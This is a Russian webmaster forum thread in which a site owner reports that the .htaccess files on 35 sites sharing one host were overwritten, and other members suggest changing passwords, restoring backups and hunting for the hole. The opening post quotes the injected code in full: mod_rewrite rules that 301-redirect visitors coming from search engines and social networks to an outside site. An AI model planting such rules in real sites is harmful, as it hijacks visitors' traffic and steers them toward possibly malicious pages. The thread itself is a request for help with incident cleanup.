Форум Практика оптимизации Любые вопросы от новичков по оптимизации

Сайты ломанули

12
S
На сайте с 13.06.2010
Offline
55
spawnsanya
1045

Во всех моих 35 сайтах .htaccess переписался

Какие действия мне предпринять в первую очередь? )

вот такое добавилось 

<IfModule mod_rewrite.c>																														

																														RewriteEngine On																														

																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														

																														RewriteRule ^(.*)$ http://tropas.ru/in.cgi?4 [R=301,L]																														

																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														

																														RewriteRule ^(.*)$ http://tropas.ru/in.cgi?4 [R=301,L]																														

																														</IfModule>
Kronus
На сайте с 06.09.2010
Offline
104
Kronus
#1

mod_rewrite вроде за чпу ссылки отвечает. На всех 35 сайтах ? Это если только доступ к хосту получили где у вас все сайты. Они на одном хосте ?

Иммерсионная (аква) печать (http://inter-decor.kz/)
S
На сайте с 13.06.2010
Offline
55
spawnsanya
#2

ага на одном хосте ночью без объявления войны файл .htaccess был злостно перезаписан у 35 сайтов

---------- Добавлено 31.03.2012 в 14:18 ----------

завтра в командировку ехать а сегодня на тебе блин, все не вовремя

Мэтт Каттс берется за domains24 - скрипт Панели Продаю сайт под SAPE
Kronus
На сайте с 06.09.2010
Offline
104
Kronus
#3

Ну тогда меняйте пасы к FTP клиентам и комп проверяйте. Права доступа на самих папках ограничивайте. Хотя что-то сомневаюсь что взломщик стал бы переписывать htaccess фаил. Непонимаю вообще зачем ему трогать rewrite. Ссылки у вас норм открываются ? Надпись <IfModule mod_rewrite.c> означает что - "если включен мод rewrite" дальше условие идти должно. А вообще прочитайте про данный мод - тут

Как правильно сделать редирект, Facebook обновил условия использования Кэширование в браузерах и
S
На сайте с 13.06.2010
Offline
55
spawnsanya
#4
Kronus:
Ну тогда меняйте пасы к FTP клиентам и комп проверяйте. Права доступа на самих папках ограничивайте. Хотя что-то сомневаюсь что взломщик стал бы переписывать htaccess фаил. Непонимаю вообще зачем ему трогать rewrite. Ссылки у вас норм открываются ?

кроме изменений файла .htaccess больше ничего не нашел. Сейчас поменял файл на старую версию и вроде опять работает, но теперь в любой момент можно ждать опять такой же бабуйни

seolink74
На сайте с 02.06.2006
Offline
396
seolink74
#5

1 смена паролей доступа

2 Восстановление с помощью бэкапа.

Продвижение в ТОП3 Яндекс с оплатой по факту(писать в личку/Москва)
S
На сайте с 13.06.2010
Offline
55
spawnsanya
#6
seolink74:
1 смена паролей доступа
2 Восстановление с помощью бэкапа.

спасибо так и сделаю. только вот бэкапы староваты

[Удален]
#7
spawnsanya:
.htaccess был злостно перезаписан у 35 сайтов

ну перепишите как надо и пароли поменяйте для начала - 10 минут работы

---------- Добавлено 31.03.2012 в 15:43 ----------

spawnsanya:
только вот бэкапы староваты

зачем бэкапы на данном этапе? ничего не поймёте где дыра

S
На сайте с 13.06.2010
Offline
55
spawnsanya
#8
Pavel_:
ну перепишите как надо и пароли поменяйте для начала - 10 минут работы

---------- Добавлено 31.03.2012 в 15:43 ----------



зачем бэкапы на данном этапе? ничего не поймёте где дыра

все сделал. только у меня такое ощущение, что придется проверять код каждого сайта намного тщательней, так как если у человека была возможность переписать .htaccess, то можно было переписать все что угодно

---------- Добавлено 31.03.2012 в 14:46 ----------

Pavel_:

зачем бэкапы на данном этапе? ничего не поймёте где дыра

их делать щас точно не буду

---------- Добавлено 31.03.2012 в 14:49 ----------

Оказывается это у timeweb сегодня косяк, ни у одного меня сегодня проблемы с этим

---------- Добавлено 31.03.2012 в 15:16 ----------

Короче даже когда сменил пароли, все равно файлы опять все поменялись

UPD: Что ждет «народные» Google анонсировал статистику запросов Поменять пин-код от карты
The WishMaster
На сайте с 29.09.2005
Offline
2542
The WishMaster
#9

Недосмотрел

Кому старенького креативного копирайтера? Тематики - туризм, СЕО, творчество, кулинария, шизотерика :)
S
На сайте с 13.06.2010
Offline
55
spawnsanya
#10

У меня такое смутное ощущение, что на одном из сайтов joomla внедрился вредоносный код и из-за этого мне придется теперь искать все очень и очень долго и тщательно((((

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий